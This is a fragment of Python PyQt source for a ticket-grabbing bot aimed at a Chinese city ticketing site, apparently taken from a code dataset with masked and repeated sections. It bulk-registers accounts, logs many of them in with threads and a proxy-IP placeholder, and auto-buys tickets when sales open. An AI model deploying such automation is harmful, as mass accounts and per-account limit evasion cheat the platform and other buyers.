self.lineEdit_8.setObjectName('lineEdit_8')\n self.lineEdit_8.setText('4')\n self.pushButton_3 
= QtWidgets.QPushButton(self.tab_2)\n self.pushButton_3.setGeometry(QtCore.QRect(30, 160, 54, 31))\n self.pushButton_3.setObjectName('pushButton_3')\n self.pushButton_3.clicked.connect(self.search_2)\n self.pushButton_quit = QtWidgets.QPushButton(self.tab_2)\n self.pushButton_quit.setGeometry(QtCore.QRect(460, 160, 54, 31))\n self.pushButton_quit.setObjectName('pushButton_quit')\n self.pushButton_quit.clicked.connect(self.exit_quit)\n self.label_4 = QtWidgets.QLabel(self.tab_2)\n self.label_4.setGeometry(QtCore.QRect(30, 210, 54, 12))\n self.label_4.setObjectName('label_4')\n self.textBrowser_1 = QtWidgets.QTextBrowser(self.tab_2)\n self.textBrowser_1.setGeometry(QtCore.QRect(30, 230, 521, 192))\n self.textBrowser_1.setObjectName('textBrowser')\n self.tabWidget.addTab(self.tab_2, '')\n MainWindow.setCentralWidget(self.centralwidget)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName('statusbar')\n MainWindow.setStatusBar(self.statusbar)\n self.tabWidget.addTab(self.tab_3, '')\n MainWindow.setCentralWidget(self.centralwidget)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName('statusbar')\n MainWindow.setStatusBar(self.statusbar)\n self.pushButton_4 = QtWidgets.QPushButton(self.tab_3)\n self.pushButton_4.setGeometry(QtCore.QRect(200, 110, 120, 30))\n self.pushButton_4.setObjectName('pushButton')\n self.lineEdit_tab3 = QtWidgets.QLineEdit(self.tab_3)\n self.lineEdit_tab3.setGeometry(QtCore.QRect(318, 111, 120, 28))\n self.lineEdit_tab3.setPlaceholderText(' 请输入注册个数')\n self.textBrowser_3 = QtWidgets.QTextBrowser(self.tab_3)\n self.textBrowser_3.setGeometry(QtCore.QRect(30, 200, 561, 221))\n self.textBrowser_3.setObjectName('textBrowser_3')\n self.label_5 = QtWidgets.QLabel(self.tab_3)\n self.label_5.setGeometry(QtCore.QRect(30, 180, 54, 12))\n self.label_5.setObjectName('label_5')\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate('MainWindow', '城市售票网-抢票'))\n 
self.pushButton.setText(_translate('MainWindow', '点击登录'))\n self.pushButton.clicked.connect(self.login)\n self.pushButton_4.clicked.connect(self.register)\n self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab),\n _translate('MainWindow', '账号登录'))\n self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_2),\n _translate('MainWindow', '抢购中心'))\n self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_3),\n _translate('MainWindow', '账号注册'))\n self.label_0.setText(_translate('MainWindow', '登录日志:'))\n self.pushButton_2.setText(_translate('MainWindow', '搜索名称'))\n self.pushButton_3.setText(_translate('MainWindow', '点击购买'))\n self.pushButton_quit.setText(_translate('MainWindow', '退出程序'))\n self.pushButton_4.setText(_translate('MainWindow', '点击注册'))\n self.label.setText(_translate('MainWindow', '已择场次:'))\n self.label_2.setText(_translate('MainWindow', '已择价格:'))\n self.label_3.setText(_translate('MainWindow', '购买总数量:'))\n self.label_4.setText(_translate('MainWindow', '购买日志:'))\n self.label_5.setText(_translate('MainWindow', '注册日志:'))\n self.label_6.setText(_translate('MainWindow', '已购买:'))\n self.label_7.setText(_translate('MainWindow', '0'))\n self.label_8.setText(_translate('MainWindow', '每个账号购买数量:'))\n self.textBrowser_3.setText('')\n self.textBrowser_2.setText('')\n self.textBrowser_1.setText('')\n self.tabWidget.setCurrentIndex(0)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n def login(self):\n try:\n regiterSum = int(self.lineEdit_tab.text())\n except Exception as err:\n res = QMessageBox.question(self, '提示', '请输入正整数!', QMessageBox.Ok)\n return\n ipList = ['']\n self.textBrowser_2.append('开始登陆,请等待...')\n userinfo_list = []\n with open('infomation.txt', 'rt', encoding='utf-8') as f:\n info_record = re.findall(\"'loginId': '(.*?)'\", f.read())\n for loginId in info_record:\n userinfo_list.append(loginId)\n for thr in userinfo_list[:regiterSum]:\n grabber = BuyUrbtix()\n ip = random.choice(ipList)\n Thread_name = Thread(target=grabber.openSite, 
args=(thr, ip))\n self.threads.append(Thread_name)\n Thread_name.setDaemon(True)\n Thread_name.start()\n\n def search_1(self):\n keyword = self.lineEdit.text()\n self.textBrowser_1.append('正在查询 %s 的所有场次和价格...' % keyword)\n if keyword == self.keywordJudge:\n self.textBrowser_1.append('请等待...')\n self.keywordJudge = ''\n return\n self.keywordJudge = keyword\n Thread_name = Thread(target=self.refresh)\n self.threads.append(Thread_name)\n Thread_name.start()\n Thread_01 = Thread(target=self.show_session_data)\n self.threads.append(Thread_01)\n Thread_01.start()\n\n def show_session_data(self):\n global SHOW_S_P\n self.comboBox_2.clear()\n self.comboBox.clear()\n while True:\n if ex.sessionName and ex.sessionPrice and SHOW_S_P:\n for i, eventDateName in enumerate(ex.sessionName):\n self.comboBox_2.addItem(eventDateName, i)\n for i, price in enumerate(ex.sessionPrice):\n self.comboBox.addItem(str(price), i)\n self.comboBox.setCurrentIndex(0)\n self.comboBox_2.setCurrentIndex(0)\n ex.sessionName.clear()\n ex.sessionPrice.clear()\n SHOW_S_P = False\n time.sleep(0.2)\n\n def refresh(self):\n try:\n if self.lineEdit.text():\n global eventDateList\n keyword = self.lineEdit.text()\n my_attr['selNum'] = self.lineEdit_8.text()\n ex.eventDateList = request_spider.get_date_url(keyword)\n if ex.eventDateList:\n self.textBrowser_1.append('查询成功,请在选择界面选择场次和价格...')\n global SESSION_DATA\n SESSION_DATA = True\n else:\n self.textBrowser_1.append('查询失败,请确定您查询的节目存在...')\n else:\n sys.exit()\n except Exception as err:\n self.textBrowser_1.append('查询失败,请确定您查询的节目存在...')\n print(err)\n sys.exit()\n\n def output_login_status(self):\n while True:\n login_record_list = login_record()\n if login_record_list:\n for i in login_record_list:\n self.textBrowser_2.append(i)\n self.textBrowser_2.moveCursor(self.textBrowser_2.\n textCursor().End)\n login_record_list.remove(i)\n time.sleep(0.1)\n\n def output_buy_record(self):\n while True:\n buy_record_list = buy_record()\n if buy_record_list:\n for 
record in buy_record_list:\n if '购买成功' in record:\n self.buy_succeed_count += 1\n self.label_7.setText(str(self.buy_succeed_count))\n self.textBrowser_1.append(record)\n self.textBrowser_1.moveCursor(self.textBrowser_1.\n textCursor().End)\n buy_record_list.remove(record)\n time.sleep(0.1)\n\n def output_register_record(self):\n while True:\n register_record_list = register_record()\n if register_record_list:\n for i in register_record_list:\n self.textBrowser_3.append(i)\n self.textBrowser_3.moveCursor(self.textBrowser_3.\n textCursor().End)\n register_record_list.remove(i)\n time.sleep(0.1)\n\n def search_2(self):\n if not self.lineEdit_1.text():\n self.textBrowser_1.append('请输入购买总数量...')\n return\n if my_attr['selNum'] and my_attr['selPrice'] and my_attr['selSeatUrl']:\n self.textBrowser_1.append('正在购买,请等待...')\n return\n if ex.saleTime:\n Thread_name = Thread(target=self.wait_sale)\n Thread_name.setDaemon(True)\n Thread_name.start()\n return\n my_attr['gross'] = self.lineEdit_1.text()\n my_attr['selNum'] = self.lineEdit_8.text()\n my_attr['selPrice'] = ex.eventPrice\n my_attr['selSeatUrl'] = ex.eventUrl\n self.textBrowser_1.append('开始购买,请您耐心等待...')\n\n def wait_sale(self):\n dateList = ex.saleTime\n print('%s年%s月%s日%s时开始售票,等待购买!' % tuple(dateList))\n self.textBrowser_1.append('%s年%s月%s日%s时开始售票,等待购买!' % tuple(dateList))\n while True:\n saleTimestamp = int(time.mktime(time.strptime(''.join(dateList) +\n '0000', '%Y%m%d%H%M%S')))\n if saleTimestamp <= int(time.time()):\n print('%s年%s月%s日%s时开始售票,开始购买!' % tuple(dateList))\n self.textBrowser_1.append('%s年%s月%s日%s时开始售票,开始购买!' 
% tuple(\n dateList))\n break\n time.sleep(1)\n my_attr['gross'] = self.lineEdit_1.text()\n my_attr['selNum'] = self.lineEdit_8.text()\n my_attr['selPrice'] = ex.eventPrice\n my_attr['selSeatUrl'] = ex.eventUrl\n self.textBrowser_1.append('开始购买,请您耐心等待...')\n\n def register(self):\n self.textBrowser_3.append('开始注册,请等待...')\n try:\n regiterSum = int(self.lineEdit_tab3.text())\n except Exception as err:\n res = QMessageBox.question(self, '提示', '请输入正整数!', QMessageBox.Ok)\n return\n threads = []\n for _ in range(regiterSum):\n uper = Register()\n Thread_name = Thread(target=uper.registerInfo)\n Thread_name.setDaemon(True)\n Thread_name.start()\n threads.append(Thread_name)\n\n def exit_quit(self):\n global EXIT_COND\n res = QMessageBox.question(self, '提示', '您确定要退出程序吗!', QMessageBox.\n Yes | QMessageBox.No)\n if res == QMessageBox.Yes:\n self._thread.exit_thread()\n time.sleep(1)\n sys.exit()\n else:\n pass\n\n\nclass Example(QMainWindow):\n sessionList = []\n priceList = []\n sessionListEvn = []\n priceListEvn = []\n eventDateList = []\n eventUrl = []\n eventPrice = []\n sessionName = []\n sessionPrice = []\n saleTime = []\n buyNum = 1\n\n def __init__(self):\n super(QMainWindow, self).__init__()\n self.setWindowTitle('城市售票网')\n self.resize(680, 800)\n self.setWindowFlags(QtCore.Qt.WindowMinimizeButtonHint)\n self.setFixedSize(self.width(), self.height())\n self.w = QWidget()\n self.w.setFixedWidth(680)\n self.w.setFixedHeight(540)\n self.setCentralWidget(self.w)\n self.topFiller = QWidget()\n self.scroll = QScrollArea()\n self.scroll.setWidget(self.topFiller)\n self.vbox = QVBoxLayout()\n self.vbox.addWidget(self.scroll)\n self.w.setLayout(self.vbox)\n self.initUI()\n\n def closeEvent(self, QCloseEvent):\n res = QMessageBox.question(self, '提示', '您确定选择无误吗?', QMessageBox.Yes |\n QMessageBox.No, QMessageBox.No)\n if res == QMessageBox.Yes:\n global SHOW_S_P\n SHOW_S_P = True\n QCloseEvent.accept()\n self.cb1.setChecked(False)\n self.cb2.setChecked(False)\n else:\n 
QCloseEvent.ignore()\n\n def initUI(self):\n self.cb1 = QCheckBox('全选', self.topFiller)\n self.cb1.move(20, 30)\n self.cb2 = QCheckBox('全选', self)\n self.cb2.move(20, 570)\n bt1 = QPushButton('确定', self)\n bt2 = QPushButton('刷新', self)\n bt1.move(20, 760)\n bt2.move(120, 760)\n self.cb1.stateChanged.connect(self.changecb1)\n self.cb2.stateChanged.connect(self.changecb2)\n bt1.clicked.connect(self.pitch_on)\n bt2.clicked.connect(self.create_c)\n\n def create_c(self):\n if self.eventDateList:\n self.sessionList = [eventDateName['eventDateName'] for\n eventDateName in self.eventDateList]\n self.priceList = [price for price in self.eventDateList[0][\n 'priceList']]\n ex.show()\n else:\n ex.show()\n QMessageBox.question(self, '提示', '搜索内容不存在!', QMessageBox.Ok)\n return\n if self.sessionListEvn and self.priceListEvn:\n for s_evn in self.sessionListEvn:\n s_evn.deleteLater()\n for p_evn in self.priceListEvn:\n p_evn.deleteLater()\n self.sessionListEvn.clear()\n self.priceListEvn.clear()\n self.eventPrice.clear()\n self.eventUrl.clear()\n for i, item in enumerate(self.sessionList):\n cb = QCheckBox(item, self.topFiller)\n cb.move(30, 60 + 30 * i)\n self.sessionListEvn.append(cb)\n cb.show()\n self.topFiller.setMinimumSize(580, (len(self.sessionList) + 5) * 30)\n for i, item in enumerate(self.priceList):\n cb_1 = QCheckBox(str(item), self)\n if i % 2 == 0:\n i = i // 2 + 1\n cb_1.move(30, 570 + 30 * i)\n else:\n i = i // 2 + 1\n cb_1.move(330, 570 + 30 * i)\n self.priceListEvn.append(cb_1)\n cb_1.show()\n\n def pitch_on(self):\n if self.sessionList:\n for i in self.sessionListEvn:\n if i.isChecked():\n for eventDate in self.eventDateList:\n if eventDate['eventDateName'] == i.text():\n if 'saleDate' in eventDate:\n self.saleTime = eventDate['saleDate']\n self.eventUrl.append(eventDate['eventUrl'])\n self.sessionName.append(eventDate['eventDateName'])\n for i in self.priceListEvn:\n if i.isChecked():\n if i.text() in self.eventDateList[0]['priceList']:\n 
self.eventPrice.append(str(self.eventDateList[0][\n 'priceList'].index(i.text())))\n self.sessionPrice.append(i.text())\n if self.eventPrice and self.eventUrl:\n self.close()\n else:\n res = QMessageBox.question(self, '提示', '您没有选择或价格场次,确定退出吗?',\n QMessageBox.Yes | QMessageBox.No, QMessageBox.No)\n if res == QMessageBox.Yes:\n self.close()\n else:\n print('输入内容不存在!')\n\n def changecb1(self):\n if self.cb1.checkState() == Qt.Checked:\n for qcb in self.sessionListEvn:\n qcb.setChecked(True)\n elif self.cb1.checkState() == Qt.Unchecked:\n for qcb in self.sessionListEvn:\n qcb.setChecked(False)\n\n def changecb2(self):\n if self.cb2.checkState() == Qt.Checked:\n for qcb in self.priceListEvn:\n qcb.setChecked(True)\n elif self.cb2.checkState() == Qt.Unchecked:\n for qcb in self.priceListEvn:\n qcb.setChecked(False)\n\n def refresh_cb(self):\n while True:\n if self.sessionList and self.priceList:\n self.create_c()\n break\n time.sleep(0.2)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Worker(QThread):\n valueChanged = pyqtSignal(int)\n handle = -1\n\n def run(self):\n global SESSION_DATA, EXIT_COND\n try:\n self.handle = ctypes.windll.kernel32.OpenThread(win32con.\n PROCESS_ALL_ACCESS, False, int(QThread.currentThreadId()))\n except Exception as e:\n print('get thread handle failed', e)\n while True:\n if SESSION_DATA:\n self.valueChanged.emit(1024)\n SESSION_DATA = False\n time.sleep(0.1)\n\n def exit_thread(self):\n os._exit(122)\n\n\nclass Ui_MainWindow(QMainWindow):\n threads = []\n keywordJudge = ''\n\n def __init__(self):\n super(Ui_MainWindow, self).__init__()\n self.buy_succeed_count = 0\n for func in [self.output_buy_record, self.output_login_status, self\n .output_register_record]:\n thr = Thread(target=func)\n thr.setDaemon(True)\n thr.start()\n self._thread = Worker(self)\n self._thread.finished.connect(self._thread.deleteLater)\n self._thread.valueChanged.connect(ex.create_c)\n self._thread.start()\n\n def setupUi(self, MainWindow):\n MainWindow.setObjectName('MainWindow')\n MainWindow.resize(640, 478)\n MainWindow.setWindowFlags(QtCore.Qt.WindowMinimizeButtonHint)\n MainWindow.setFixedSize(self.width(), self.height())\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName('centralwidget')\n self.tabWidget = QtWidgets.QTabWidget(self.centralwidget)\n self.tabWidget.setGeometry(QtCore.QRect(0, 0, 631, 461))\n self.tabWidget.setObjectName('tabWidget')\n self.tab = QtWidgets.QWidget()\n self.tab.setObjectName('tab')\n self.pushButton = QtWidgets.QPushButton(self.tab)\n self.pushButton.setGeometry(QtCore.QRect(200, 110, 120, 30))\n self.pushButton.setObjectName('pushButton')\n self.lineEdit_tab = QtWidgets.QLineEdit(self.tab)\n self.lineEdit_tab.setGeometry(QtCore.QRect(318, 111, 120, 28))\n self.lineEdit_tab.setPlaceholderText(' 请输入登陆个数')\n self.label_0 = QtWidgets.QLabel(self.tab)\n self.label_0.setGeometry(QtCore.QRect(30, 180, 54, 12))\n 
self.label_0.setObjectName('label_0')\n self.textBrowser_2 = QtWidgets.QTextBrowser(self.tab)\n self.textBrowser_2.setGeometry(QtCore.QRect(30, 200, 561, 221))\n self.textBrowser_2.setObjectName('textBrowser_2')\n self.tabWidget.addTab(self.tab, '')\n self.tab_2 = QtWidgets.QWidget()\n self.tab_2.setObjectName('tab_2')\n self.tabWidget.addTab(self.tab, '')\n self.tab_3 = QtWidgets.QWidget()\n self.tab_3.setObjectName('tab_3')\n self.lineEdit = QtWidgets.QLineEdit(self.tab_2)\n self.lineEdit.setGeometry(QtCore.QRect(90, 30, 171, 31))\n self.lineEdit.setObjectName('lineEdit')\n self.pushButton_2 = QtWidgets.QPushButton(self.tab_2)\n self.pushButton_2.setGeometry(QtCore.QRect(30, 30, 58, 32))\n self.pushButton_2.setObjectName('pushButton_2')\n self.pushButton_2.clicked.connect(self.search_1)\n self.label = QtWidgets.QLabel(self.tab_2)\n self.label.setGeometry(QtCore.QRect(30, 80, 54, 12))\n self.label.setObjectName('label')\n self.label_2 = QtWidgets.QLabel(self.tab_2)\n self.label_2.setGeometry(QtCore.QRect(30, 130, 54, 12))\n self.label_2.setObjectName('label_2')\n self.comboBox = QtWidgets.QComboBox(self.tab_2)\n self.comboBox.setGeometry(QtCore.QRect(90, 120, 191, 31))\n self.comboBox.setObjectName('comboBox')\n self.comboBox_2 = QtWidgets.QComboBox(self.tab_2)\n self.comboBox_2.setGeometry(QtCore.QRect(90, 70, 459, 31))\n self.comboBox_2.setObjectName('comboBox_2')\n self.label_3 = QtWidgets.QLabel(self.tab_2)\n self.label_3.setGeometry(QtCore.QRect(300, 40, 70, 12))\n self.label_3.setObjectName('label_3')\n self.lineEdit_1 = QtWidgets.QLineEdit(self.tab_2)\n self.lineEdit_1.setGeometry(QtCore.QRect(375, 32, 51, 27))\n self.lineEdit_1.setObjectName('lineEdit_1')\n self.label_6 = QtWidgets.QLabel(self.tab_2)\n self.label_6.setGeometry(QtCore.QRect(450, 40, 54, 12))\n self.label_6.setObjectName('label_6')\n self.label_7 = QtWidgets.QLabel(self.tab_2)\n self.label_7.setGeometry(QtCore.QRect(500, 40, 54, 12))\n self.label_7.setObjectName('label_7')\n 
self.label_7.setStyleSheet('font-size:16px;color:red')\n self.label_8 = QtWidgets.QLabel(self.tab_2)\n self.label_8.setGeometry(QtCore.QRect(300, 130, 100, 12))\n self.label_8.setObjectName('label_8')\n self.lineEdit_8 = QtWidgets.QLineEdit(self.tab_2)\n self.lineEdit_8.setGeometry(QtCore.QRect(415, 122, 51, 27))\n self.lineEdit_8.setObjectName('lineEdit_8')\n self.lineEdit_8.setText('4')\n self.pushButton_3 = QtWidgets.QPushButton(self.tab_2)\n self.pushButton_3.setGeometry(QtCore.QRect(30, 160, 54, 31))\n self.pushButton_3.setObjectName('pushButton_3')\n self.pushButton_3.clicked.connect(self.search_2)\n self.pushButton_quit = QtWidgets.QPushButton(self.tab_2)\n self.pushButton_quit.setGeometry(QtCore.QRect(460, 160, 54, 31))\n self.pushButton_quit.setObjectName('pushButton_quit')\n self.pushButton_quit.clicked.connect(self.exit_quit)\n self.label_4 = QtWidgets.QLabel(self.tab_2)\n self.label_4.setGeometry(QtCore.QRect(30, 210, 54, 12))\n self.label_4.setObjectName('label_4')\n self.textBrowser_1 = QtWidgets.QTextBrowser(self.tab_2)\n self.textBrowser_1.setGeometry(QtCore.QRect(30, 230, 521, 192))\n self.textBrowser_1.setObjectName('textBrowser')\n self.tabWidget.addTab(self.tab_2, '')\n MainWindow.setCentralWidget(self.centralwidget)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName('statusbar')\n MainWindow.setStatusBar(self.statusbar)\n self.tabWidget.addTab(self.tab_3, '')\n MainWindow.setCentralWidget(self.centralwidget)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName('statusbar')\n MainWindow.setStatusBar(self.statusbar)\n self.pushButton_4 = QtWidgets.QPushButton(self.tab_3)\n self.pushButton_4.setGeometry(QtCore.QRect(200, 110, 120, 30))\n self.pushButton_4.setObjectName('pushButton')\n self.lineEdit_tab3 = QtWidgets.QLineEdit(self.tab_3)\n self.lineEdit_tab3.setGeometry(QtCore.QRect(318, 111, 120, 28))\n self.lineEdit_tab3.setPlaceholderText(' 请输入注册个数')\n self.textBrowser_3 = 
QtWidgets.QTextBrowser(self.tab_3)\n self.textBrowser_3.setGeometry(QtCore.QRect(30, 200, 561, 221))\n self.textBrowser_3.setObjectName('textBrowser_3')\n self.label_5 = QtWidgets.QLabel(self.tab_3)\n self.label_5.setGeometry(QtCore.QRect(30, 180, 54, 12))\n self.label_5.setObjectName('label_5')\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate('MainWindow', '城市售票网-抢票'))\n self.pushButton.setText(_translate('MainWindow', '点击登录'))\n self.pushButton.clicked.connect(self.login)\n self.pushButton_4.clicked.connect(self.register)\n self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab),\n _translate('MainWindow', '账号登录'))\n self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_2),\n _translate('MainWindow', '抢购中心'))\n self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_3),\n _translate('MainWindow', '账号注册'))\n self.label_0.setText(_translate('MainWindow', '登录日志:'))\n self.pushButton_2.setText(_translate('MainWindow', '搜索名称'))\n self.pushButton_3.setText(_translate('MainWindow', '点击购买'))\n self.pushButton_quit.setText(_translate('MainWindow', '退出程序'))\n self.pushButton_4.setText(_translate('MainWindow', '点击注册'))\n self.label.setText(_translate('MainWindow', '已择场次:'))\n self.label_2.setText(_translate('MainWindow', '已择价格:'))\n self.label_3.setText(_translate('MainWindow', '购买总数量:'))\n self.label_4.setText(_translate('MainWindow', '购买日志:'))\n self.label_5.setText(_translate('MainWindow', '注册日志:'))\n self.label_6.setText(_translate('MainWindow', '已购买:'))\n self.label_7.setText(_translate('MainWindow', '0'))\n self.label_8.setText(_translate('MainWindow', '每个账号购买数量:'))\n self.textBrowser_3.setText('')\n self.textBrowser_2.setText('')\n self.textBrowser_1.setText('')\n self.tabWidget.setCurrentIndex(0)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n def login(self):\n try:\n regiterSum = int(self.lineEdit_tab.text())\n except Exception as err:\n res = QMessageBox.question(self, '提示', '请输入正整数!', QMessageBox.Ok)\n 
return\n ipList = ['']\n self.textBrowser_2.append('开始登陆,请等待...')\n userinfo_list = []\n with open('infomation.txt', 'rt', encoding='utf-8') as f:\n info_record = re.findall(\"'loginId': '(.*?)'\", f.read())\n for loginId in info_record:\n userinfo_list.append(loginId)\n for thr in userinfo_list[:regiterSum]:\n grabber = BuyUrbtix()\n ip = random.choice(ipList)\n Thread_name = Thread(target=grabber.openSite, args=(thr, ip))\n self.threads.append(Thread_name)\n Thread_name.setDaemon(True)\n Thread_name.start()\n\n def search_1(self):\n keyword = self.lineEdit.text()\n self.textBrowser_1.append('正在查询 %s 的所有场次和价格...' % keyword)\n if keyword == self.keywordJudge:\n self.textBrowser_1.append('请等待...')\n self.keywordJudge = ''\n return\n self.keywordJudge = keyword\n Thread_name = Thread(target=self.refresh)\n self.threads.append(Thread_name)\n Thread_name.start()\n Thread_01 = Thread(target=self.show_session_data)\n self.threads.append(Thread_01)\n Thread_01.start()\n\n def show_session_data(self):\n global SHOW_S_P\n self.comboBox_2.clear()\n self.comboBox.clear()\n while True:\n if ex.sessionName and ex.sessionPrice and SHOW_S_P:\n for i, eventDateName in enumerate(ex.sessionName):\n self.comboBox_2.addItem(eventDateName, i)\n for i, price in enumerate(ex.sessionPrice):\n self.comboBox.addItem(str(price), i)\n self.comboBox.setCurrentIndex(0)\n self.comboBox_2.setCurrentIndex(0)\n ex.sessionName.clear()\n ex.sessionPrice.clear()\n SHOW_S_P = False\n time.sleep(0.2)\n\n def refresh(self):\n try:\n if self.lineEdit.text():\n global eventDateList\n keyword = self.lineEdit.text()\n my_attr['selNum'] = self.lineEdit_8.text()\n ex.eventDateList = request_spider.get_date_url(keyword)\n if ex.eventDateList:\n self.textBrowser_1.append('查询成功,请在选择界面选择场次和价格...')\n global SESSION_DATA\n SESSION_DATA = True\n else:\n self.textBrowser_1.append('查询失败,请确定您查询的节目存在...')\n else:\n sys.exit()\n except Exception as err:\n self.textBrowser_1.append('查询失败,请确定您查询的节目存在...')\n print(err)\n 
sys.exit()\n\n def output_login_status(self):\n while True:\n login_record_list = login_record()\n if login_record_list:\n for i in login_record_list:\n self.textBrowser_2.append(i)\n self.textBrowser_2.moveCursor(self.textBrowser_2.\n textCursor().End)\n login_record_list.remove(i)\n time.sleep(0.1)\n\n def output_buy_record(self):\n while True:\n buy_record_list = buy_record()\n if buy_record_list:\n for record in buy_record_list:\n if '购买成功' in record:\n self.buy_succeed_count += 1\n self.label_7.setText(str(self.buy_succeed_count))\n self.textBrowser_1.append(record)\n self.textBrowser_1.moveCursor(self.textBrowser_1.\n textCursor().End)\n buy_record_list.remove(record)\n time.sleep(0.1)\n\n def output_register_record(self):\n while True:\n register_record_list = register_record()\n if register_record_list:\n for i in register_record_list:\n self.textBrowser_3.append(i)\n self.textBrowser_3.moveCursor(self.textBrowser_3.\n textCursor().End)\n register_record_list.remove(i)\n time.sleep(0.1)\n\n def search_2(self):\n if not self.lineEdit_1.text():\n self.textBrowser_1.append('请输入购买总数量...')\n return\n if my_attr['selNum'] and my_attr['selPrice'] and my_attr['selSeatUrl']:\n self.textBrowser_1.append('正在购买,请等待...')\n return\n if ex.saleTime:\n Thread_name = Thread(target=self.wait_sale)\n Thread_name.setDaemon(True)\n Thread_name.start()\n return\n my_attr['gross'] = self.lineEdit_1.text()\n my_attr['selNum'] = self.lineEdit_8.text()\n my_attr['selPrice'] = ex.eventPrice\n my_attr['selSeatUrl'] = ex.eventUrl\n self.textBrowser_1.append('开始购买,请您耐心等待...')\n\n def wait_sale(self):\n dateList = ex.saleTime\n print('%s年%s月%s日%s时开始售票,等待购买!' % tuple(dateList))\n self.textBrowser_1.append('%s年%s月%s日%s时开始售票,等待购买!' % tuple(dateList))\n while True:\n saleTimestamp = int(time.mktime(time.strptime(''.join(dateList) +\n '0000', '%Y%m%d%H%M%S')))\n if saleTimestamp <= int(time.time()):\n print('%s年%s月%s日%s时开始售票,开始购买!' 
% tuple(dateList))\n self.textBrowser_1.append('%s年%s月%s日%s时开始售票,开始购买!' % tuple(\n dateList))\n break\n time.sleep(1)\n my_attr['gross'] = self.lineEdit_1.text()\n my_attr['selNum'] = self.lineEdit_8.text()\n my_attr['selPrice'] = ex.eventPrice\n my_attr['selSeatUrl'] = ex.eventUrl\n self.textBrowser_1.append('开始购买,请您耐心等待...')\n\n def register(self):\n self.textBrowser_3.append('开始注册,请等待...')\n try:\n regiterSum = int(self.lineEdit_tab3.text())\n except Exception as err:\n res = QMessageBox.question(self, '提示', '请输入正整数!', QMessageBox.Ok)\n return\n threads = []\n for _ in range(regiterSum):\n uper = Register()\n Thread_name = Thread(target=uper.registerInfo)\n Thread_name.setDaemon(True)\n Thread_name.start()\n threads.append(Thread_name)\n\n def exit_quit(self):\n global EXIT_COND\n res = QMessageBox.question(self, '提示', '您确定要退出程序吗!', QMessageBox.\n Yes | QMessageBox.No)\n if res == QMessageBox.Yes:\n self._thread.exit_thread()\n time.sleep(1)\n sys.exit()\n else:\n pass\n\n\nclass Example(QMainWindow):\n sessionList = []\n priceList = []\n sessionListEvn = []\n priceListEvn = []\n eventDateList = []\n eventUrl = []\n eventPrice = []\n sessionName = []\n sessionPrice = []\n saleTime = []\n buyNum = 1\n\n def __init__(self):\n super(QMainWindow, self).__init__()\n self.setWindowTitle('城市售票网')\n self.resize(680, 800)\n self.setWindowFlags(QtCore.Qt.WindowMinimizeButtonHint)\n self.setFixedSize(self.width(), self.height())\n self.w = QWidget()\n self.w.setFixedWidth(680)\n self.w.setFixedHeight(540)\n self.setCentralWidget(self.w)\n self.topFiller = QWidget()\n self.scroll = QScrollArea()\n self.scroll.setWidget(self.topFiller)\n self.vbox = QVBoxLayout()\n self.vbox.addWidget(self.scroll)\n self.w.setLayout(self.vbox)\n self.initUI()\n\n def closeEvent(self, QCloseEvent):\n res = QMessageBox.question(self, '提示', '您确定选择无误吗?', QMessageBox.Yes |\n QMessageBox.No, QMessageBox.No)\n if res == QMessageBox.Yes:\n global SHOW_S_P\n SHOW_S_P = True\n QCloseEvent.accept()\n 
self.cb1.setChecked(False)\n self.cb2.setChecked(False)\n else:\n QCloseEvent.ignore()\n\n def initUI(self):\n self.cb1 = QCheckBox('全选', self.topFiller)\n self.cb1.move(20, 30)\n self.cb2 = QCheckBox('全选', self)\n self.cb2.move(20, 570)\n bt1 = QPushButton('确定', self)\n bt2 = QPushButton('刷新', self)\n bt1.move(20, 760)\n bt2.move(120, 760)\n self.cb1.stateChanged.connect(self.changecb1)\n self.cb2.stateChanged.connect(self.changecb2)\n bt1.clicked.connect(self.pitch_on)\n bt2.clicked.connect(self.create_c)\n\n def create_c(self):\n if self.eventDateList:\n self.sessionList = [eventDateName['eventDateName'] for\n eventDateName in self.eventDateList]\n self.priceList = [price for price in self.eventDateList[0][\n 'priceList']]\n ex.show()\n else:\n ex.show()\n QMessageBox.question(self, '提示', '搜索内容不存在!', QMessageBox.Ok)\n return\n if self.sessionListEvn and self.priceListEvn:\n for s_evn in self.sessionListEvn:\n s_evn.deleteLater()\n for p_evn in self.priceListEvn:\n p_evn.deleteLater()\n self.sessionListEvn.clear()\n self.priceListEvn.clear()\n self.eventPrice.clear()\n self.eventUrl.clear()\n for i, item in enumerate(self.sessionList):\n cb = QCheckBox(item, self.topFiller)\n cb.move(30, 60 + 30 * i)\n self.sessionListEvn.append(cb)\n cb.show()\n self.topFiller.setMinimumSize(580, (len(self.sessionList) + 5) * 30)\n for i, item in enumerate(self.priceList):\n cb_1 = QCheckBox(str(item), self)\n if i % 2 == 0:\n i = i // 2 + 1\n cb_1.move(30, 570 + 30 * i)\n else:\n i = i // 2 + 1\n cb_1.move(330, 570 + 30 * i)\n self.priceListEvn.append(cb_1)\n cb_1.show()\n\n def pitch_on(self):\n if self.sessionList:\n for i in self.sessionListEvn:\n if i.isChecked():\n for eventDate in self.eventDateList:\n if eventDate['eventDateName'] == i.text():\n if 'saleDate' in eventDate:\n self.saleTime = eventDate['saleDate']\n self.eventUrl.append(eventDate['eventUrl'])\n self.sessionName.append(eventDate['eventDateName'])\n for i in self.priceListEvn:\n if i.isChecked():\n if 
